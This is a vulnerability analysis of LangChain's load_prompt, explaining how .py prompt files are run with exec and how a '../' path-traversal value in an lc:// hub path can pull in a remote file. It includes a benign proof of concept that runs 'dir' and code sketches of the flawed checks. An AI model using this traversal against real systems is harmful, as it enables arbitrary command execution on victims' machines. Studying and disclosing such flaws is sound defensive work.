Vulnerability Introduction

LangChain is a framework for developing applications driven by language models.

In affected versions of LangChain, the load_prompt function performs no security filtering on the content of the prompt file it loads. An attacker can craft a prompt file containing malicious commands and trick a user into loading it, which causes arbitrary system commands to be executed.



Vulnerability Reproduction

Create test.py in the project directory:

```python
from langchain.prompts import load_prompt

if __name__ == '__main__':
    loaded_prompt = load_prompt("system.py")
```

In the same directory, create system.py, which runs the system command dir:

```python
import os

os.system("dir")
```

Running test.py prints the output of the dir command:



Vulnerability Analysis: _load_prompt_from_file



langchain.prompts.loading.load_prompt

try_load_from_hub first tries to load the file remotely from the given path. Because we are loading a local file, that attempt does not apply, and execution continues to _load_prompt_from_file.
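The hub-first, local-fallback control flow can be sketched as follows. This is a simplified model, not LangChain's source: `fake_try_load_from_hub` and `fake_load_from_file` are hypothetical stand-ins that only report which branch was taken, and the plain `lc://` prefix test is a simplification of the real regex match.

```python
from typing import Callable, Optional


def fake_try_load_from_hub(path: str, loader: Callable[[str], str]) -> Optional[str]:
    """Hypothetical stand-in: return None for anything that is not an lc:// path."""
    if not path.startswith("lc://"):
        return None  # not a hub path, so the caller falls back to the local file
    # The real code would download the file first; here we only tag the path.
    return loader("downloaded-copy-of-" + path)


def fake_load_from_file(path: str) -> str:
    """Hypothetical stand-in for _load_prompt_from_file; just reports the path."""
    return f"loaded local file {path}"


def load_prompt_sketch(path: str) -> str:
    # Try the hub first; only when it returns None is the local file read.
    hub_result = fake_try_load_from_hub(path, fake_load_from_file)
    if hub_result is not None:
        return hub_result
    return fake_load_from_file(path)


print(load_prompt_sketch("system.py"))  # loaded local file system.py
```

Either way the same file loader ends up being called, which is why both the local path and the lc:// path lead to the same dangerous code.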



langchain.prompts.loading._load_prompt_from_file

_load_prompt_from_file decides how to load the file based on its suffix. When the suffix is .py, it reads the file and executes its contents with exec.

In other words, the relevant code boils down to:

```python
if __name__ == '__main__':
    file_path = "system.py"
    with open(file_path, "rb") as f:
        exec(f.read())
```
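To show why the .py branch is the dangerous one, here is a minimal sketch of suffix-based dispatch. It is a simplified model, not LangChain's source: `load_prompt_from_file_sketch` is a hypothetical name, YAML handling is omitted to stay within the standard library, and reading a `PROMPT` variable from the executed file is an assumption about how a .py prompt hands back its result. The payload writes a marker file instead of running dir.

```python
import json
import tempfile
import types
from pathlib import Path


def load_prompt_from_file_sketch(file: str) -> object:
    """Hypothetical, simplified model of suffix-based dispatch (not LangChain's code)."""
    file_path = Path(file)
    if file_path.suffix == ".json":
        # Data-only format: json.load parses the file but never runs it.
        with open(file_path) as f:
            return json.load(f)
    if file_path.suffix == ".py":
        # Code format: the whole file body runs with the caller's privileges.
        module = types.ModuleType("prompt")
        with open(file_path, "rb") as f:
            exec(f.read(), module.__dict__)
        # Any side effect (such as os.system("dir")) has already happened here.
        return getattr(module, "PROMPT", None)
    raise ValueError(f"Unsupported file type {file_path.suffix}")


with tempfile.TemporaryDirectory() as tmp:
    marker = Path(tmp) / "executed.txt"
    payload = Path(tmp) / "system.py"
    # Harmless stand-in for os.system("dir"): the payload writes a marker file.
    payload.write_text(
        f"import pathlib\npathlib.Path({str(marker)!r}).write_text('executed')\n",
        encoding="utf-8",
    )
    result = load_prompt_from_file_sketch(str(payload))
    marker_text = marker.read_text()

print(result, marker_text)  # None executed
```

The loader returns nothing useful (the payload defines no PROMPT), yet the payload has already run by the time the function returns, so any validation of the result comes too late.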

Vulnerability Analysis: try_load_from_hub

Because of network problems, I was unable to reproduce this path successfully, so what follows is a code-level analysis.

```python
from langchain.prompts import load_prompt

if __name__ == '__main__':
    loaded_prompt = load_prompt("lc://prompts/../../../../../../../system.py")
```

langchain.prompts.loading.load_prompt





langchain.utilities.loading.try_load_from_hub

The path is first matched against `HUB_PATH_RE = re.compile(r"lc(?P<ref>@[^:]+)?://(?P<path>.*)")`, so it must begin with lc:// (optionally with an @ref between lc and ://). The rest of the path is then checked: its first component must be prompts, and its file suffix must be one of {'py', 'yaml', 'json'}.
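The checks described above can be sketched with the standard library. `check_hub_path` is a hypothetical helper, not LangChain's function, and it simply returns None when any check fails (the real code may handle failures differently). It uses `PurePosixPath` so the result is the same on Windows and POSIX.

```python
import re
from pathlib import PurePosixPath
from typing import FrozenSet, Optional, Tuple

# Pattern as quoted in the analysis above.
HUB_PATH_RE = re.compile(r"lc(?P<ref>@[^:]+)?://(?P<path>.*)")


def check_hub_path(
    path: str,
    valid_prefix: str = "prompts",
    valid_suffixes: FrozenSet[str] = frozenset({"py", "yaml", "json"}),
) -> Optional[Tuple[Optional[str], PurePosixPath]]:
    """Hypothetical helper: return (ref, remote_path) if all checks pass, else None."""
    match = HUB_PATH_RE.match(path)
    if not match:
        return None  # must start with lc:// (or lc@<ref>://)
    ref = match.group("ref")
    remote_path = PurePosixPath(match.group("path"))
    if not remote_path.parts or remote_path.parts[0] != valid_prefix:
        return None  # first path component must be "prompts"
    if remote_path.suffix[1:] not in valid_suffixes:
        return None  # suffix must be py, yaml or json
    # ".." components are neither rejected nor normalized by these checks.
    return ref, remote_path


# The traversal path from the PoC passes every check.
print(check_hub_path("lc://prompts/../../../../../../../system.py"))
```

Because only the first component and the suffix are inspected, the ../ segments in between reach the URL-construction step untouched.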

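Finally, the remote path is joined onto the hub's base URL to build the request URL. Because the path may contain ../ sequences, the joined URL can escape the project's restricted location and point to a file we control; that file is then fetched and loaded, which leads to arbitrary command execution.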
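The traversal step can be checked with the standard library alone. This sketch assumes the base URL is `https://raw.githubusercontent.com/hwchase17/langchain-hub/master/` (an assumption for illustration; the analysis above does not state it), and `build_hub_url` is a hypothetical helper. `urllib.parse.urljoin` resolves `..` segments and drops any that would climb above the host root. The `prompts/example` and `attacker/repo` paths are hypothetical.

```python
from urllib.parse import urljoin

# Assumption for illustration: the base URL that hub paths are joined onto.
ASSUMED_BASE = "https://raw.githubusercontent.com/hwchase17/langchain-hub/master/"


def build_hub_url(remote_path: str) -> str:
    """Hypothetical helper: join a hub-relative path onto the assumed base URL."""
    # urljoin resolves "." and ".." segments, so "../" climbs out of the base
    # directory instead of being rejected; extra ".." at the root are dropped.
    return urljoin(ASSUMED_BASE, remote_path)


# A normal (hypothetical) prompt path stays inside the hub repository.
print(build_hub_url("prompts/example/prompt.json"))
# -> https://raw.githubusercontent.com/hwchase17/langchain-hub/master/prompts/example/prompt.json

# The PoC path climbs past the repository root to the host root.
print(build_hub_url("prompts/../../../../../../../system.py"))
# -> https://raw.githubusercontent.com/system.py

# Hypothetical attacker repository: four ".." cancel prompts/ and the three base dirs.
print(build_hub_url("prompts/../../../../attacker/repo/main/system.py"))
# -> https://raw.githubusercontent.com/attacker/repo/main/system.py
```

With exactly enough ../ segments, the joined URL points into any repository on the same host rather than into the hub repository.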

Vulnerability Summary

I tested the latest version, and the vulnerability still exists. At its core, load_prompt will load and execute a local or remotely specified Python file. In practice it should not be easy to exploit, because it only works if the attacker can control the path of the Python file passed to load_prompt.
